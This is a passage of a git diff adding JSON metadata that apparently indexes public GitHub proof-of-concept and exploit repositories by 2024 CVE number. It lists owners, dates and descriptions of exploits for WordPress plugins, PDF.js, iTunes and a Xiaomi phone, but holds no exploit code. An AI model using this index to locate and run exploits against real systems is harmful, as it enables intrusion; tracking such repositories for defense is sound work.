"2024-11-06T19:15:38Z", + "updated_at": "2024-11-07T14:29:14Z", + "pushed_at": "2024-11-07T14:28:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 912425407, + "name": "WEAPONIZING-CVE-2024-4367", + "full_name": "exfil0\/WEAPONIZING-CVE-2024-4367", + "owner": { + "login": "exfil0", + "id": 84948741, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84948741?v=4", + "html_url": "https:\/\/github.com\/exfil0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exfil0\/WEAPONIZING-CVE-2024-4367", + "description": "CVE-2024-4367 is a critical vulnerability (CVSS 9.8) in PDF.js, allowing arbitrary JavaScript code execution due to insufficient type checks on the FontMatrix object within PDF files.", + "fork": false, + "created_at": "2025-01-05T14:44:01Z", + "updated_at": "2025-01-05T19:21:53Z", + "pushed_at": "2025-01-05T19:21:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-4367", + "spyware", + "weaponized" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43917.json b/2024/CVE-2024-43917.json new file mode 100644 index 0000000000..444916d5ba --- /dev/null +++ b/2024/CVE-2024-43917.json @@ -0,0 +1,33 @@ +[ + { + "id": 864780093, + "name": "CVE-2024-43917", + "full_name": "p33d\/CVE-2024-43917", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-43917", + "description": null, + "fork": false, + "created_at": "2024-09-29T06:23:35Z", + "updated_at": "2025-01-07T12:51:10Z", + "pushed_at": "2024-09-29T06:48:13Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43918.json b/2024/CVE-2024-43918.json new file mode 100644 index 0000000000..5a395554af --- /dev/null +++ b/2024/CVE-2024-43918.json @@ -0,0 +1,33 @@ +[ + { + "id": 862146506, + "name": "CVE-2024-43918", + "full_name": "KTN1990\/CVE-2024-43918", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-43918", + "description": "WBW Product Table Pro <= 1.9.4 - Unauthenticated Arbitrary SQL Execution to RCE", + "fork": false, + "created_at": "2024-09-24T05:50:03Z", + "updated_at": "2024-12-10T02:51:42Z", + "pushed_at": "2024-09-24T05:52:04Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43919.json b/2024/CVE-2024-43919.json new file mode 100644 index 0000000000..604a3c44df --- /dev/null +++ b/2024/CVE-2024-43919.json @@ -0,0 +1,33 @@ +[ + { + "id": 892694266, + "name": "CVE-2024-43919", + "full_name": "RandomRobbieBF\/CVE-2024-43919", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-43919", + "description": "YARPP <= 5.30.10 - Missing Authorization", + "fork": false, + "created_at": "2024-11-22T15:42:39Z", + "updated_at": "2024-11-22T15:44:26Z", + "pushed_at": "2024-11-22T15:44:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43965.json b/2024/CVE-2024-43965.json new file mode 100644 index 0000000000..8c9097663b --- /dev/null +++ b/2024/CVE-2024-43965.json @@ -0,0 +1,33 @@ +[ + { + "id": 872256938, + "name": "CVE-2024-43965", + "full_name": "RandomRobbieBF\/CVE-2024-43965", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-43965", + "description": "SendGrid for WordPress <= 1.4 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-10-14T05:58:17Z", + "updated_at": "2024-10-18T17:57:10Z", + "pushed_at": "2024-10-14T05:59:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43998.json b/2024/CVE-2024-43998.json new file mode 100644 index 0000000000..490567d3a0 --- /dev/null +++ b/2024/CVE-2024-43998.json @@ -0,0 +1,33 @@ +[ + { + "id": 855090098, + "name": "CVE-2024-43998", + "full_name": "RandomRobbieBF\/CVE-2024-43998", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-43998", + "description": "Blogpoet <= 1.0.2 - Missing Authorization via blogpoet_install_and_activate_plugins()", + "fork": false, + "created_at": "2024-09-10T09:38:20Z", + "updated_at": "2024-10-18T17:57:40Z", + "pushed_at": "2024-09-10T09:45:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44000.json b/2024/CVE-2024-44000.json new file mode 100644 index 0000000000..05bb7c536e --- /dev/null +++ b/2024/CVE-2024-44000.json @@ -0,0 +1,126 @@ +[ + { + "id": 853128126, + "name": "CVE-2024-44000-LiteSpeed-Cache", + "full_name": "absholi7ly\/CVE-2024-44000-LiteSpeed-Cache", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/CVE-2024-44000-LiteSpeed-Cache", + "description": "CVE-2024-44000 is a vulnerability in the LiteSpeed Cache plugin, a popular WordPress plugin. This vulnerability affects session management in LiteSpeed Cache, allowing attackers to gain unauthorized access to sensitive data.", + "fork": false, + "created_at": "2024-09-06T03:38:13Z", + "updated_at": "2024-12-30T11:41:54Z", + "pushed_at": "2024-09-06T03:54:52Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 853354116, + "name": "CVE-2024-44000", + "full_name": "gbrsh\/CVE-2024-44000", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2024-44000", + "description": "LiteSpeed Unauthorized Account Takeover", + "fork": false, + "created_at": "2024-09-06T13:43:30Z", + "updated_at": "2024-09-06T13:46:53Z", + "pushed_at": "2024-09-06T13:46:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858218268, + "name": "CVE-2024-44000-LiteSpeed-Cache", + "full_name": "ifqygazhar\/CVE-2024-44000-LiteSpeed-Cache", + "owner": { + "login": "ifqygazhar", + "id": 82558488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82558488?v=4", + "html_url": "https:\/\/github.com\/ifqygazhar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifqygazhar\/CVE-2024-44000-LiteSpeed-Cache", + "description": "CVE-2024-44000-LiteSpeed-Cache", + "fork": false, + "created_at": "2024-09-16T14:13:52Z", + "updated_at": "2024-10-30T09:53:59Z", + "pushed_at": "2024-09-16T14:27:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 870756822, + "name": "CVE-2024-44000", + "full_name": "geniuszly\/CVE-2024-44000", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/CVE-2024-44000", + "description": "is a PoC tool designed to exploit insecurely exposed debug logs from WordPress sites and extract session cookies", + "fork": false, + "created_at": "2024-10-10T15:58:10Z", + "updated_at": "2024-10-21T08:14:54Z", + "pushed_at": "2024-10-10T15:59:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4406.json b/2024/CVE-2024-4406.json new file mode 100644 index 0000000000..93c124eba9 --- /dev/null +++ b/2024/CVE-2024-4406.json @@ -0,0 +1,33 @@ +[ + { + "id": 872352341, + "name": "cve-2024-4406-xiaomi13pro-exploit-files", + "full_name": "Yogehi\/cve-2024-4406-xiaomi13pro-exploit-files", + "owner": { + "login": "Yogehi", + "id": 10925671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10925671?v=4", + "html_url": "https:\/\/github.com\/Yogehi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yogehi\/cve-2024-4406-xiaomi13pro-exploit-files", + "description": "Files related to the Pwn2Own Toronto 2023 exploit against the Xiaomi 13 Pro.", + "fork": false, + "created_at": "2024-10-14T09:38:04Z", + "updated_at": "2024-11-25T06:46:01Z", + "pushed_at": "2024-10-14T09:43:53Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44083.json b/2024/CVE-2024-44083.json new file mode 100644 index 0000000000..138a3c7e22 --- /dev/null +++ b/2024/CVE-2024-44083.json @@ -0,0 +1,33 @@ +[ + { + "id": 847298960, + "name": "CVE-2024-44083", + "full_name": "Azvanzed\/CVE-2024-44083", + "owner": { + "login": "Azvanzed", + "id": 107370797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107370797?v=4", + "html_url": "https:\/\/github.com\/Azvanzed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Azvanzed\/CVE-2024-44083", + "description": "Makes IDA (most versions) to crash upon opening it. ", + "fork": false, + "created_at": "2024-08-25T12:33:14Z", + "updated_at": "2025-01-01T21:38:09Z", + "pushed_at": "2024-08-30T09:58:12Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 74, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44193.json b/2024/CVE-2024-44193.json new file mode 100644 index 0000000000..12e1cddd39 --- /dev/null +++ b/2024/CVE-2024-44193.json @@ -0,0 +1,33 @@ +[ + { + "id": 867684338, + "name": "CVE-2024-44193", + "full_name": "mbog14\/CVE-2024-44193", + "owner": { + "login": "mbog14", + "id": 74453009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74453009?v=4", + "html_url": "https:\/\/github.com\/mbog14", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbog14\/CVE-2024-44193", + "description": "Hacking Windows through iTunes  - Local Privilege Escalation 0-day", + "fork": false, + "created_at": "2024-10-04T14:20:15Z", + "updated_at": "2024-12-28T12:40:31Z", + "pushed_at": "2024-10-04T14:59:50Z", + "stargazers_count": 93, + "watchers_count": 93, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 93, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44258.json b/2024/CVE-2024-44258.json new file mode 100644 index 0000000000..82c5246b33 --- /dev/null +++ b/2024/CVE-2024-44258.json @@ -0,0 +1,33 @@ +[ + { + "id": 880195363, + "name": "CVE-2024-44258", + "full_name": "ifpdz\/CVE-2024-44258", + "owner": { + "login": "ifpdz", + "id": 105882406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105882406?v=4", + "html_url": "https:\/\/github.com\/ifpdz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifpdz\/CVE-2024-44258", + "description": "CVE-2024-44258", + "fork": false, + "created_at": "2024-10-29T09:45:03Z", + "updated_at": "2024-12-23T03:15:29Z", + "pushed_at": "2024-11-02T19:20:44Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 61, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44285.json b/2024/CVE-2024-44285.json new file mode 100644 index 0000000000..e83f652b0a --- /dev/null +++ b/2024/CVE-2024-44285.json @@ -0,0 +1,33 @@ +[ + { + "id": 896477779, + "name": "explt", + "full_name": "slds1\/explt", + "owner": { + "login": "slds1", + "id": 147923950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147923950?v=4", + "html_url": "https:\/\/github.com\/slds1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/slds1\/explt", + "description": "App for CVE-2024-44285", + "fork": false, + "created_at": "2024-11-30T13:22:05Z", + "updated_at": "2024-11-30T13:23:04Z", + "pushed_at": "2024-11-30T13:23:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44337.json b/2024/CVE-2024-44337.json new file mode 100644 index 0000000000..c2bf247f0d --- /dev/null +++ b/2024/CVE-2024-44337.json @@ -0,0 +1,33 @@ +[ + { + "id": 873032825, + "name": "CVE-2024-44337", + "full_name": "Brinmon\/CVE-2024-44337", + "owner": { + "login": "Brinmon", + "id": 135578945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135578945?v=4", + "html_url": "https:\/\/github.com\/Brinmon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Brinmon\/CVE-2024-44337", + "description": "CVE-2024-44337 POC The package `github.com\/gomarkdown\/markdown` is a Go library for parsing Markdown text and rendering as HTML. which allowed a remote attacker to cause a denial of service (DoS) condition by providing a tailor-made input that caused an infinite loop, causing the program to hang and consume resources indefinitely.", + "fork": false, + "created_at": "2024-10-15T13:44:20Z", + "updated_at": "2024-11-20T16:31:07Z", + "pushed_at": "2024-10-15T13:56:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44346.json b/2024/CVE-2024-44346.json new file mode 100644 index 0000000000..77667ea1a2 --- /dev/null +++ b/2024/CVE-2024-44346.json @@ -0,0 +1,71 @@ +[ + { + "id": 856852288, + "name": "CVE-2024-44346", + "full_name": "Shauryae1337\/CVE-2024-44346", + "owner": { + "login": "Shauryae1337", + "id": 83474425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83474425?v=4", + "html_url": "https:\/\/github.com\/Shauryae1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shauryae1337\/CVE-2024-44346", + "description": "Public Disclosure", + "fork": false, + "created_at": "2024-09-13T10:27:23Z", + "updated_at": "2024-09-25T06:45:26Z", + "pushed_at": "2024-09-25T06:45:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858902234, + "name": "CVE-2024-44346", + "full_name": "sahil3276\/CVE-2024-44346", + "owner": { + "login": "sahil3276", + "id": 105536637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105536637?v=4", + "html_url": "https:\/\/github.com\/sahil3276", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sahil3276\/CVE-2024-44346", + "description": "Public Disclosure of CVE-2024-44346", + "fork": false, + "created_at": "2024-09-17T18:20:59Z", + "updated_at": "2024-09-17T18:29:29Z", + "pushed_at": "2024-09-17T18:22:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "cve", + "cve-2024-44346", + "disclosure", + "public", + "sahil3276" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44349.json b/2024/CVE-2024-44349.json new file mode 100644 index 0000000000..9192fe181f --- /dev/null +++ b/2024/CVE-2024-44349.json @@ -0,0 +1,33 @@ +[ + { + "id": 834035076, + "name": "PoC-CVE-2024-44349", + "full_name": "AndreaF17\/PoC-CVE-2024-44349", + "owner": { + "login": "AndreaF17", + "id": 31658778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31658778?v=4", + "html_url": "https:\/\/github.com\/AndreaF17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AndreaF17\/PoC-CVE-2024-44349", + "description": null, + "fork": false, + "created_at": "2024-07-26T09:24:37Z", + "updated_at": "2024-11-23T18:03:41Z", + "pushed_at": "2024-10-07T14:00:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4439.json b/2024/CVE-2024-4439.json new file mode 100644 index 0000000000..2a3c4d30fe --- /dev/null +++ b/2024/CVE-2024-4439.json @@ -0,0 +1,157 @@ +[ + { + "id": 796592858, + "name": "CVE-2024-4439", + "full_name": "MielPopsssssss\/CVE-2024-4439", + "owner": { + "login": "MielPopsssssss", + "id": 79650146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79650146?v=4", + "html_url": "https:\/\/github.com\/MielPopsssssss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MielPopsssssss\/CVE-2024-4439", + "description": "CVE-2024-4439 PoC", + "fork": false, + "created_at": "2024-05-06T08:50:23Z", + "updated_at": "2024-09-19T11:29:31Z", + "pushed_at": "2024-05-06T08:50:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796599635, + "name": "CVE-2024-4439", + "full_name": "d0rb\/CVE-2024-4439", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-4439", + "description": "The provided exploit code leverages a stored Cross-Site Scripting (XSS) vulnerability (CVE-2024-4439) in WordPress Core versions up to 6.5.1.", + "fork": false, + "created_at": "2024-05-06T09:07:36Z", + "updated_at": "2024-11-20T23:45:41Z", + "pushed_at": "2024-05-06T09:09:18Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 803543826, + "name": "-CVE-2024-4439", + "full_name": "xssor-dz\/-CVE-2024-4439", + "owner": { + "login": "xssor-dz", + "id": 34897518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34897518?v=4", + "html_url": "https:\/\/github.com\/xssor-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xssor-dz\/-CVE-2024-4439", + "description": "WordPress Core < 6.5.2 - Unauthenticated & Authenticated (Contributor+) Stored Cross-Site Scripting via Avatar Block", + "fork": false, + "created_at": "2024-05-20T23:39:54Z", + "updated_at": "2024-05-20T23:44:48Z", + "pushed_at": "2024-05-20T23:44:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870571270, + "name": "CVE-2024-4439", + "full_name": "soltanali0\/CVE-2024-4439", + "owner": { + "login": "soltanali0", + "id": 87374678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87374678?v=4", + "html_url": "https:\/\/github.com\/soltanali0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soltanali0\/CVE-2024-4439", + "description": "aa", + "fork": false, + "created_at": "2024-10-10T09:30:11Z", + "updated_at": "2024-10-10T09:43:46Z", + "pushed_at": "2024-10-10T09:43:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892084521, + "name": "CVE-2024-4439", + "full_name": "w0r1i0g1ht\/CVE-2024-4439", + "owner": { + "login": "w0r1i0g1ht", + "id": 78846391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78846391?v=4", + "html_url": "https:\/\/github.com\/w0r1i0g1ht", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w0r1i0g1ht\/CVE-2024-4439", + "description": "CVE-2024-4439 docker and poc", + "fork": false, + "created_at": "2024-11-21T13:36:25Z", + "updated_at": "2024-11-21T13:42:38Z", + "pushed_at": "2024-11-21T13:42:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4443.json b/2024/CVE-2024-4443.json new file mode 100644 index 0000000000..11618d64eb --- /dev/null +++ b/2024/CVE-2024-4443.json @@ -0,0 +1,33 @@ +[ + { + "id": 806196076, + "name": "CVE-2024-4443-Poc", + "full_name": "truonghuuphuc\/CVE-2024-4443-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4443-Poc", + "description": "CVE-2024-4443 Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - Unauthenticated SQL Injection via listingfields Parameter", + "fork": false, + "created_at": "2024-05-26T16:34:58Z", + "updated_at": "2024-06-26T12:03:29Z", + "pushed_at": "2024-05-26T16:48:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44450.json b/2024/CVE-2024-44450.json new file mode 100644 index 0000000000..0c9b5d6103 --- /dev/null +++ b/2024/CVE-2024-44450.json @@ -0,0 +1,33 @@ +[ + { + "id": 853305470, + "name": "CVE-2024-44450", + "full_name": "VoidSecOrg\/CVE-2024-44450", + "owner": { + "login": "VoidSecOrg", + "id": 141265227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141265227?v=4", + "html_url": "https:\/\/github.com\/VoidSecOrg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VoidSecOrg\/CVE-2024-44450", + "description": null, + "fork": false, + "created_at": "2024-09-06T11:53:03Z", + "updated_at": "2024-09-06T11:53:40Z", + "pushed_at": "2024-09-06T11:53:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44541.json b/2024/CVE-2024-44541.json new file mode 100644 index 0000000000..7fbe463e4c --- /dev/null +++ b/2024/CVE-2024-44541.json @@ -0,0 +1,33 @@ +[ + { + "id": 839253700, + "name": "CVE-2024-44541", + "full_name": "pointedsec\/CVE-2024-44541", + "owner": { + "login": "pointedsec", + "id": 113613079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113613079?v=4", + "html_url": "https:\/\/github.com\/pointedsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pointedsec\/CVE-2024-44541", + "description": "This repository details a SQL Injection vulnerability in Inventio Lite v4's, including exploitation steps and a Python script to automate the attack. It provides information on the vulnerable code, recommended fixes, and how to extract and decrypt administrative credentials.", + "fork": false, + "created_at": "2024-08-07T08:45:43Z", + "updated_at": "2024-12-13T12:02:08Z", + "pushed_at": "2024-12-13T12:02:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44542.json b/2024/CVE-2024-44542.json new file mode 100644 index 0000000000..4561e18d0a --- /dev/null +++ b/2024/CVE-2024-44542.json @@ -0,0 +1,33 @@ +[ + { + "id": 856975237, + "name": "CVE-2024-44542", + "full_name": "alphandbelt\/CVE-2024-44542", + "owner": { + "login": "alphandbelt", + "id": 28209685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28209685?v=4", + "html_url": "https:\/\/github.com\/alphandbelt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alphandbelt\/CVE-2024-44542", + "description": null, + "fork": false, + "created_at": "2024-09-13T15:05:17Z", + "updated_at": "2024-09-13T15:05:40Z", + "pushed_at": "2024-09-13T15:05:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44610.json b/2024/CVE-2024-44610.json new file mode 100644 index 0000000000..e65bcc4807 --- /dev/null +++ b/2024/CVE-2024-44610.json @@ -0,0 +1,33 @@ +[ + { + "id": 832592795, + "name": "PcanExploit", + "full_name": 